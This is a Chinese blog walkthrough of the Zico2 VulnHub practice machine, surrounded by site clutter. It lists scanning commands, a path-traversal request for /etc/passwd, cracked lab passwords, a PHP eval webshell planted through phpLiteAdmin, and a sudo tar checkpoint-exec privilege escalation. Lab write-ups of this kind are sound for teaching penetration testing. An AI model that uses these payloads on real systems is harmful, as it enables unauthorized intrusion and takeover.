Zico2

Gigity123

于 2024-09-19 21:29:07 发布

阅读量287

点赞数 7

文章标签：网络安全

本文链接：https://blog.csdn.net/2301_80154010/article/details/142370315

版权

主机发现

arp-scan -l

端口扫描

nmap -sV -sC -sT -O 192.168.195.131

目录扫描

dirb http://192.168.195.131

浏览器访问

页面往下翻，点击这个页面

跳转到这，可能存在文件包含漏洞

将page参数修改

page=../../etc/passwd

扫描的目录中 /dbadmin 有登录页面

尝试弱口令 admin 成功登录进去

查看数据库，发现用户名和密码

https://www.somd5.com/   #破解密码网站
在这个网站中破解出
root    34kroot34
zico    zico2215@

getshell

尝试添加新的库

添加一句话木马

<?php phpinfo(); @eval($_POST['cmd']);?>

重新命名库

返回 /dbadmin找到我们的one.php

蚁剑连接

在 /home/zico/wordpress/wp-config.php 这个目录找到了

账号和密码：

zico

sWfCsfJSPV9H3AmQzw8

权限提升

因为开启了ssh 尝试ssh登录

ssh zico@192.168.195.131
密码： sWfCsfJSPV9H3AmQzw8

sudo -l

利用tar提权

echo "/bin/bash" > shell.sh

sudo tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh shell.sh

提权成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Gigity123

关注关注

7
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

zico2靶机

薛定谔嘚喵博客

03-19

409

文件包含，远程php代码执行漏洞，一句话木马

zico2靶机练习

weixin_71090536的博客

08-04

372

下方实操中，使用到攻击机 Kali 和靶机 zico2两台机器均开启 NAT 模式，比较方便快速扫描。

参与评论您还未登录，请先登录后发表或查看评论

zico2: 1靶机

m0_61995767的博客

07-31

500

zico2: 1打靶记录

Zico 2靶机渗透测试

weixin_58786230的博客

08-02

407

【代码】Zico 2靶机渗透测试。

ZICO2靶机

2401_84564260的博客

08-08

171

更具提示，创建一个新库，并在新库中新建一个表，在标的字段写入一句话木马。yijian连接，用view.php包含数据库文件。靶机开放了ssh，用这两个用户连接一下，都连不上。环境配置，将kali设置为2网段的仅主机模式。看看phpliteadmin有没有历史漏洞。type选择text，默认值插入一句话木马。dbadmin看上去像个数据库接口。view.php存在文件包含。在数据库中发现账号密码。主机发现目录端口扫描。

【vulnhub】zico2靶机

weixin_62162207的博客

08-01

367

zico2靶机：打靶训练

Vulnhub-Zico2靶机实战

御七彩虹猫

03-24

3227

Vulnhub-Zico2靶机实战

漏洞复现 -- Zico 2

2301_80854251的博客

06-29

195

漏洞复现 -- Zico 2

vulnhub zico2 靶场练习

鸥鹭忘机

12-22

3631

前言这次练习的靶机是vulnhub平台的zico2。下载地址为：https://www.vulnhub.com/entry/zico2-1,210/。虚拟机配置这次采用的网络连接模式依然是NAT模式，为了避免扫描到其他物理主机。在导入虚拟机后，右击zico2靶机，然后选中配置。依次点击网络配置->NAT模式->高级->生成，然后确认即可。收集信息通过arp协议扫描局域网，又快又准，但是只能扫描局域网内的ip。 arp-scan -l 发现靶机的IP地址为 `192.168.

VMware的Zico2虚拟机

05-12

VMware的Zico2虚拟机是一款基于VMware平台的预配置虚拟机，它专为测试、演示或开发目的设计。Zico2虚拟机的核心在于它提供了便捷的环境，让用户能够快速部署一个完整的操作系统实例，而无需从零开始安装和配置。在IT...

靶机综合渗透环境(zico2手册）.pdf

04-07

靶机综合渗透环境——zico2渗透实战

zico2靶机渗透测试过程

weixin_46429206的博客

10-20

1482

1、收集ip(netdiscover) netdiscover -i eth0 -r 192.168.116.0/24 -i:选择网卡 -r:选择网段 .1是物理机ip；.2是网关ip；.254是边界ip；.169是目的主机ip 2、收集开放端口(masscan) masscan --rate 10000 --ports 0-65535 192.168.116.169 –rate:发包速率 --ports:选择扫描端口 3、收集开放端口对应的服务 nmap -p 80,22,111,59266 192.

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8471

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

健身房管理系统代码系统 Springboot健身房管理系统（程序，中文注释）

09-26

海思SDK及大量官方PDF文档：hi3516dv100 和RTP示例工程代码：HisiLive

09-26

海思SDK及大量官方PDF文档：hi3516dv100 和RTP示例工程代码：HisiLive

电池镍片自动检测设备_三维3D设计图纸.zip

09-26

电池镍片自动检测设备_三维3D设计图纸.zip

小微园区数字化建设方案.pptx

09-26

小微园区数字化建设方案

python科学数据笔记(Python Scientific lecture notes) 英文版